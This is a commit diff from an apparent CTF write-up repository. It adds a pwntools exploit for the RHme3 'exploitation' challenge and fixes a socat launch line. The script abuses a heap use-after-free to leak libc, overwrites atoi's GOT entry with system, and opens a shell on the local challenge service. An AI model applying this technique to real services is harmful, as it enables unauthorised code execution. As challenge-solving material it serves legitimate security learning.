finish 6.1.9

src/writeup/6.1.9_rhme3_exploitation/exp.py

@@ -0,0 +1,80 @@
+from pwn import *
+
+# context.log_level = 'debug'
+
+p = remote('127.0.0.1', 10001)
+# p = process('./main.elf')
+
+def alloc(name, attack = 1, defense = 2, speed = 3, precision = 4):
+    p.recvuntil('choice: ')
+    p.sendline('1')
+    p.recvuntil('name: ')
+    p.sendline(name)
+    p.recvuntil('points: ')
+    p.sendline(str(attack))
+    p.recvuntil('points: ')
+    p.sendline(str(defense))
+    p.recvuntil('speed: ')
+    p.sendline(str(speed))
+    p.recvuntil('precision: ')
+    p.sendline(str(precision))
+
+def free(idx):
+    p.recvuntil('choice: ')
+    p.sendline('2')
+    p.recvuntil('index: ')
+    p.sendline(str(idx))
+
+def select(idx):
+    p.recvuntil('choice: ')
+    p.sendline('3')
+    p.recvuntil('index: ')
+    p.sendline(str(idx))
+
+def edit(name):
+    p.recvuntil('choice: ')
+    p.sendline('4')
+    p.recvuntil('choice: ')
+    p.sendline('1')
+    p.recvuntil('name: ')
+    p.sendline(name)
+
+def show():
+    p.recvuntil('choice: ')
+    p.sendline('5')
+
+# gdb.attach(p, '''
+# b *0x00402205
+# c
+# ''')
+
+atoi_got = 0x603110
+
+alloc('A' * 0x60)
+alloc('B' * 0x80)
+alloc('C' * 0x80)
+select(1)
+
+free(1)
+show()
+p.recvuntil('Name: ')
+
+leak    = u64(p.recv(6).ljust(8, '\x00'))
+libc    = leak - 0x3c4b78   # 0x3c4b78 = leak - libc
+system  = libc + 0x045390   # $ readelf -s libc.so.6 | grep system@
+
+log.info("leak   => 0x%x" % leak)
+log.info("libc   => 0x%x" % libc)
+log.info("system => 0x%x" % system)
+
+free(2)
+
+alloc('D'*16 + p64(atoi_got))
+
+# atoi@got -> system@got
+edit(p64(system))
+
+# get shell
+p.recvuntil('choice: ')
+p.sendline('sh')
+p.interactive()

src/writeup/6.1.9_rhme3_exploitation/run.sh

@@ -1 +1 @@
-socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=libc.so.6 ./main.elf" &
+socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so.6 ./main.elf" &